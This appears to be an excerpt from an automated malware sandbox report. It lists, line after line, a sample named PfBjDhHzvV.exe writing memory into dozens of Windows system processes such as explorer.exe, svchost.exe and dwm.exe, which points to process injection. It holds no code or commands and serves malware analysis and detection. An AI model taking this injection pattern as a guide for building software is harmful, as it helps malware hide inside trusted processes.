            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\smartscreen.exe base: 90000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 30000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: 140000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: C60000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 2B0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\conhost.exe base: 5A0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: DD0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\svchost.exe base: AA0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\dllhost.exe base: 6D0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: 9E0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: A00000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: B00000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\dwm.exe base: 40000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\sihost.exe base: 3E0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\svchost.exe base: 40000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\svchost.exe base: 9B0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\ctfmon.exe base: AE0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\explorer.exe base: 2D40000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\svchost.exe base: C00000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: CD0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 8F0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: F00000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 9F0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 980000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\smartscreen.exe base: A0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 40000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: 150000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: C70000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 2C0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\conhost.exe base: 5B0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: DE0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\svchost.exe base: AB0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\dllhost.exe base: 6E0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: 9F0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: A10000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: B10000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\dwm.exe base: 50000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\sihost.exe base: 3F0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\svchost.exe base: 50000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\svchost.exe base: 9C0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\ctfmon.exe base: AF0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\explorer.exe base: 2D50000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\svchost.exe base: C10000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: CE0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 900000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: F10000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: A00000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 990000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\smartscreen.exe base: B0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 50000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: 160000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: C80000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 2D0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\conhost.exe base: 5C0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: DF0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\svchost.exe base: AC0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\dllhost.exe base: 6F0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: A00000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: A20000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: B20000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\dwm.exe base: 60000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\sihost.exe base: 400000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\svchost.exe base: 60000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\svchost.exe base: 9D0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\ctfmon.exe base: B00000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\explorer.exe base: 8880000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\svchost.exe base: C20000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: CF0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 910000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: F20000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: A10000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 9A0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\smartscreen.exe base: C0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 60000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: 170000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: C90000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 2E0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\conhost.exe base: 5D0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: E00000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\svchost.exe base: AD0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\dllhost.exe base: 700000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: A10000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: A30000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: B30000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\dwm.exe base: 70000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\sihost.exe base: 410000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\svchost.exe base: 70000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\svchost.exe base: 9E0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\ctfmon.exe base: B10000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\explorer.exe base: 8850000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\svchost.exe base: C30000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: D00000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 920000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: F30000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: A20000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 9B0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\smartscreen.exe base: D0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 70000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: 180000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: CA0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 2F0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\conhost.exe base: 5E0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: E10000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\svchost.exe base: AE0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\dllhost.exe base: 710000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: A20000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: A40000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: B40000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\dwm.exe base: 80000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\sihost.exe base: 420000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\svchost.exe base: 80000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\svchost.exe base: 9F0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\ctfmon.exe base: B20000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\explorer.exe base: 2F60000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\svchost.exe base: C40000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: D10000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 930000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: F40000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: A30000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 9C0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\smartscreen.exe base: E0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 80000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: 190000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: CB0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 300000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\conhost.exe base: 5F0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: E20000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\svchost.exe base: AF0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\dllhost.exe base: 720000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: A30000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: A50000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: B50000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\dwm.exe base: 90000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\sihost.exe base: 430000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\svchost.exe base: 90000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\svchost.exe base: A00000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\ctfmon.exe base: B30000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\explorer.exe base: 8830000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\svchost.exe base: C50000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: D20000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 940000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: F50000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: A40000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 9D0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\smartscreen.exe base: F0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 90000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: 1A0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: CC0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 310000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\conhost.exe base: 600000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: E30000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\svchost.exe base: B00000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\dllhost.exe base: 730000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: A40000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: A60000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: B60000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\dwm.exe base: A0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\sihost.exe base: 440000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\svchost.exe base: A0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\svchost.exe base: A10000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\ctfmon.exe base: B40000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\explorer.exe base: 8860000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\svchost.exe base: C60000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: D30000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 950000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: F60000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: A50000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 9E0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\smartscreen.exe base: 100000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: A0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: 1B0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: CD0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 320000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\conhost.exe base: 610000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: E40000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\svchost.exe base: B10000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\dllhost.exe base: 740000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: A50000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: A70000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: B70000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\dwm.exe base: B0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\sihost.exe base: 450000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\svchost.exe base: B0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\svchost.exe base: A20000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\ctfmon.exe base: B50000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\explorer.exe base: 8870000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\svchost.exe base: C70000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: D40000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 960000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: F70000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: A60000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 9F0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\smartscreen.exe base: 110000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: B0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: 1C0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: CE0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 330000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\conhost.exe base: 620000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: E50000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\svchost.exe base: B20000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\dllhost.exe base: 750000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: A60000Jump to behavior
